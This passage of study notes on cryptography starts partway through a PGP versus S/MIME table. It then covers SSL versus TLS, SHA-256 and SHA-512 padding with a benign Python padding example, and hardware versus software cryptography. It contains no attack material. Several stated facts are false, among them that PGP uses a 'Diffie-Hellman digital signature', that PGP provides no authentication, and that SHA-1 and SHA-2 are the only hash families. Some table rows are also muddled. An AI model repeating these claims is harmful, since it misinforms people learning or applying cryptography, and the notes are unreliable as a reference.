10. | PGP uses the Diffie-Hellman digital signature. | It uses the ElGamal digital signature.
11. | In PGP, trust is established using the Web of Trust. | In S/MIME, trust is established using Public Key Infrastructure.
12. | PGP doesn't provide authentication. | S/MIME provides authentication.
13. | PGP is used for securing text messages only. | S/MIME is used for securing messages and attachments.
14. | There is less use of PGP in industry. | S/MIME is widely used in industry.
15. | Convenience of PGP is low. | Convenience of S/MIME is high.
16. | Administrative overhead of PGP is high. | Administrative overhead of S/MIME is low.

7. Type of cryptography. What is security at transport layer SSL and TLS? What is
SHA-256 and SHA-512? What is cryptography implementation?

Answer- Cryptography is the study of securing communications from outside observers.
Encryption algorithms take the original message, or plaintext, and convert it into
ciphertext, which is not understandable. The key allows the user to decrypt the message,
thus ensuring only they can read the message. The strength of the randomness of an
encryption is also studied, which makes it harder for anyone to guess the key or input of
the algorithm. Cryptography is how we can achieve more secure and robust connections to
elevate our privacy. Advancements in cryptography make it harder to break encryption so
that encrypted files, folders, or network connections are only accessible to authorized users.

Cryptography focuses on four different objectives:

1. Confidentiality: Confidentiality ensures that only the intended recipient can decrypt
the message and read its contents.
2. Non-repudiation: Non-repudiation means the sender of the message cannot
backtrack in the future and deny their reasons for sending or creating the message.
3. Integrity: Integrity focuses on the ability to be certain that the information contained
within the message cannot be modified while in storage or transit.
4. Authenticity: Authenticity ensures the sender and recipient can verify each other's
identities and the destination of the message.

There are some differences between SSL and TLS which are given below:

SSL | TLS
SSL stands for Secure Socket Layer. | TLS stands for Transport Layer Security.
SSL supports the Fortezza algorithm. | TLS does not support the Fortezza algorithm.
SSL is the 3.0 version. | TLS is the 1.0 version.
In SSL, the Message digest is used to create a master secret. | In TLS, a Pseudo-random function is used to create a master secret.
In SSL, the Message Authentication Code protocol is used. | In TLS, the Hashed Message Authentication Code protocol is used.
SSL is more complex than TLS. | TLS is simple.
SSL is less secured as compared to TLS. | TLS provides high security.
SSL is less reliable and slower. | TLS is highly reliable and upgraded. It provides less latency.
SSL has been deprecated. | TLS is still widely used.
SSL uses port to set up explicit connection. | TLS uses protocol to set up implicit connection.

What is SHA 256?

There are two families of hash functions, SHA-1 and SHA-2. SHA 256 belongs to the
SHA-2 family of hashes. SHA-1 is a cryptographic hash function that was designed around
1995 and was disapproved for cryptographic usage after 2010. SHA 256 is a hashing
algorithm that was published in 2001 when SHA-1 was losing its strength against brute
force attacks. The hashing algorithm was a joint effort between the National Security Agency
and NIST.

The number 256 has a unique significance in its functionality. The number signifies the
length of the final hash value or digest. It means that no matter how big the plain text is, the
hash algorithm will always produce a 256-bit hash value.

Here are some key characteristics of the SHA 256 algorithm:

1. The length of the message, cleartext, or plaintext should be less than 2^64 bits. The
message can be of any length, but it must stay below this limit.
2. The digest length or the final hashed value should be 256 bits.
3. All the 256-bit hash algorithms should be irreversible. It means that the plaintext
should not be retrievable if the digest is available, or vice versa.

Padding bits

The padding bits are a concept in hashing where additional bits like 0 or 1 are added to
complete the block. Let me explain!

The cryptographic algorithm manages the input provided by you in blocks. Hence, if the
block is 512 bits and there are five more bits left to complete the entire message apart from
the last 64 bits, five padding bits will be added to it. These bits will be 1,0,0,0,0.

What is SHA 512?

Just like SHA 256, SHA 512 also belongs to the SHA-2 family of hashes. Though it is not
as widely used as SHA 256, it is also a powerful hashing algorithm.

The characteristics of SHA 512 are almost the same as those of SHA 256, with the following
differences:

1. The length of the produced hash or digest is 512 bits.
2. The input message is broken down into block sizes that will be in multiples of 1024
bits.
3. The message should be irreversible. The plaintext should not be retrievable if the
digest is available, or vice versa.

Other than this, the padding bits work in the same way as in SHA 256. The block size is
1024. If there are seven bits left other than 128 bits to complete the input or the next multiple
of 1024, padding bits should be added to complete the input. The padding bits would be
1,0,0,0,0,0,0.
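The padding rule described for SHA 256 and SHA 512 above, as an added example in Python (not code from these notes): one function generalises both cases to any block size and length-field width, reproduces the two worked cases in the text, and also gives the byte-oriented form that a real implementation feeds to the compression function. All function names are my own.

```python
# Added example: SHA-2 message padding as specified in FIPS 180-4, for both
# SHA-256 (512-bit blocks, 64-bit length field) and SHA-512 (1024-bit blocks,
# 128-bit length field). Messages are strings of '0'/'1' characters so the
# bit-level cases from the text can be reproduced exactly.

def pad_bits(message: str, block_bits: int, length_bits: int) -> str:
    """Append a single '1' bit, then k '0' bits, then the message length as a
    big-endian integer of length_bits bits, so the result fills whole blocks.
    k is the smallest value with len(message) + 1 + k == block_bits - length_bits
    (mod block_bits); this is the '1,0,0,...' padding the notes describe."""
    length = len(message)
    if length >= 2 ** length_bits:
        # the length field cannot hold the size: the 2^64 / 2^128 bit limit
        raise ValueError("message too long for the length field")
    k = (block_bits - length_bits - 1 - length) % block_bits
    padded = message + "1" + "0" * k + format(length, f"0{length_bits}b")
    assert len(padded) % block_bits == 0
    return padded

def sha256_pad(message: str) -> str:
    return pad_bits(message, 512, 64)

def sha512_pad(message: str) -> str:
    return pad_bits(message, 1024, 128)

def padding_bits(message: str, block_bits: int, length_bits: int) -> str:
    """Only the bits inserted between the message and the length field."""
    padded = pad_bits(message, block_bits, length_bits)
    return padded[len(message):len(padded) - length_bits]

def pad_bytes(data: bytes, block_bits: int, length_bits: int) -> bytes:
    """Byte-oriented form for ordinary byte strings (any number of blocks)."""
    bits = "".join(format(b, "08b") for b in data)
    padded = pad_bits(bits, block_bits, length_bits)
    return int(padded, 2).to_bytes(len(padded) // 8, "big")

def block_count(data: bytes, block_bits: int, length_bits: int) -> int:
    """Number of compression-function blocks the padded message occupies."""
    return len(pad_bytes(data, block_bits, length_bits)) * 8 // block_bits

if __name__ == "__main__":
    # constructed inputs matching the two worked cases in the notes:
    # 443 message bits leave 5 bits before the 64-bit length field (SHA-256),
    # 889 message bits leave 7 bits before the 128-bit length field (SHA-512)
    print(padding_bits("0" * 443, 512, 64))      # 10000
    print(padding_bits("0" * 889, 1024, 128))    # 1000000
    print(pad_bytes(b"abc", 512, 64).hex())
```

A message that already fills 448 of the 512 bits (56 bytes) spills into a second block, because the '1' bit and the length field never fit in the current one.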

What is cryptography implementation?

Modern cryptographic algorithms can be implemented using dedicated cryptographic
hardware or software running on general-purpose hardware. For various reasons, dedicated
cryptographic hardware provides a better solution for most applications. Table 1 shows a list
of reasons hardware-based cryptographic solutions are more desirable.

Table 1. Hardware vs. Software Cryptography Comparison

S.NO | Hardware-Based Cryptography | Software-Based Cryptography
1. | Uses dedicated hardware, thus much faster to execute. | Uses shared hardware, thus slower to execute.
2. | Not dependent on the operating system. Supported by dedicated software for operating the hardware. | Dependent on the security levels and features of the operating system and supported software.
3. | Can use factory provisioning and securely store keys and other data in dedicated secure memory locations. | No dedicated secure memory locations available. Thus, susceptible to stealing or manipulation of keys and data.
4. | Maxim's hardware implementations have protections built in against reverse engineering such as PUF (ChipDNA). | Software implementations can be easier to reverse engineer.
5. | In a hardware system, special care is taken to hide and protect the vital information such as private keys to make it much more difficult to access. | In a general-purpose system where software cryptography is implemented, there are more ways to snoop and access vital information. An example would be intercepting the private key in transit within the computer's system.
